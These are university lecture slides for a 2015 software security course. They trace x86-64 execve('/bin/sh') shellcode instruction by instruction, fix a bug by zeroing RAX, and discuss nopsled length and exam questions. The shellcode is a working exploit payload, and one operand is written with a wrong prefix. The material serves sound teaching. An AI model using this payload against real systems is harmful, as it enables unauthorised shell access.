SLIDE 1
Assignment 5b — Software and Web Security, March 24th, 2015
Assignment 5b — Software and Web Security, March 24th, 2015. Initial state: RAX 0x???????????????? RBX 0x???????????????? RDX 0x???????????????? RDI RSI stack RSP xor %rdx, %rdx RAX 0x???????????????? RBX 0x???????????????? RDX
SLIDE 2
SLIDE 3
xor %rdx, %rdx
RAX 0x???????????????? RBX 0x???????????????? RDX 0x???????????????? RDI RSI stack RSP
SLIDE 4
xor %rdx, %rdx
RAX 0x???????????????? RBX 0x???????????????? RDX 0x???????????????? RDI RSI stack RSP
SLIDE 5
xor %rdx, %rdx
RAX 0x???????????????? RBX 0x???????????????? RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 6
mov $0x68732f6e69622f2f, %rbx
RAX 0x???????????????? RBX 0x???????????????? RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 7
mov $0x68732f6e69622f2f, %rbx
RAX 0x???????????????? RBX 0x???????????????? RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 8
mov $0x68732f6e69622f2f, %rbx
RAX 0x???????????????? RBX 0x68732f6e69622f2f RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 9
shr $0x8, %rbx
RAX 0x???????????????? RBX 0x68732f6e69622f2f RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 10
shr $0x8, %rbx
RAX 0x???????????????? RBX 0x68732f6e69622f2f RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 11
shr $0x8, %rbx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 12
push %rbx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 13
push %rbx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 14
push %rbx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 15
mov %rsp, %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 16
mov %rsp, %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 17
mov %rsp, %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 18
mov %rsp, %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 19
push %rdx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 20
push %rdx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f RSP
SLIDE 21
push %rdx
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 RSP
SLIDE 22
push %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 RSP
SLIDE 23
push %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 RSP
SLIDE 24
push %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 25
push %rdi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 26
mov %rsp, %rsi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 27
mov %rsp, %rsi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 28
mov %rsp, %rsi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 29
mov %rsp, %rsi
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 30
mov %0x3b, %al
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 31
mov %0x3b, %al
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 32
mov %0x3b, %al
RAX 0x000000000000003b RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 33
syscall
RAX 0x000000000000003b RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 34
syscall
RAX 0x000000000000003b sys_execve RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
sys_execve(char *filename, char *argv[], char *envp[]);
SLIDE 35
syscall
RAX 0x000000000000003b sys_execve RBX \0hs/nib/ RDX 0x0000000000000000 RDI RSI stack \0hs/nib/ 0x0000000000000000 0x???????????????? RSP
sys_execve(char *filename, char *argv[], char *envp[]);
SLIDE 36
syscall
RAX 0x000000000000003b sys_execve RBX /bin/sh\0 RDX 0x0000000000000000 RDI RSI stack /bin/sh\0 0x0000000000000000 0x???????????????? RSP
sys_execve("/bin/sh", ["/bin/sh", NULL], NULL);
SLIDE 37
Lies!
Actually, I lied a bit.
SLIDE 38
mov %0x3b, %al
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 39
mov %0x3b, %al
RAX 0x???????????????? RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 40
mov %0x3b, %al
RAX 0x??????????????3b RBX 0x0068732f6e69622f RDX 0x0000000000000000 RDI RSI stack 0x0068732f6e69622f 0x0000000000000000 0x???????????????? RSP
SLIDE 41
Bugfix:
Ensure that RAX contains 0x0000000000000000 before the move into %al: that instruction writes only the low byte of RAX, so the upper 56 bits keep whatever value they had before and the syscall number is wrong. How?
SLIDE 42
xor %rax, %rax
RAX 0x???????????????? RBX 0x???????????????? RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 43
xor %rax, %rax
RAX 0x???????????????? RBX 0x???????????????? RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 44
xor %rax, %rax
RAX 0x0000000000000000 RBX 0x???????????????? RDX 0x0000000000000000 RDI RSI stack RSP
SLIDE 45
Bytecode
◮ The bytecode (machine-code encoding) for this instruction is 0x48 0x31 0xc0.
◮ The shellcode gets 3 bytes longer.
◮ So the nopsled should be 3 bytes shorter.
SLIDE 46
Exam Questions
◮ We won't ask you to write a working exploit using pen and paper.
◮ But you are expected to be able to answer some questions about exploiting a vulnerability.
SLIDE 47
Exam Questions
For example: why won't the first exploit shown in assignment 5 work when exploiting a buffer that is copied with strcpy?
SLIDE 48
Takeaways
◮ Use the tools you have at your disposal:
  ◮ valgrind
  ◮ address sanitizer
  ◮ debuggers (gdb, lldb)
  ◮ ...
◮ Read the documentation!
◮ Do not trust input, and be aware of where all your inputs come from!
◮ C is unforgiving and doesn't care if you shoot yourself in the foot.
SLIDE 49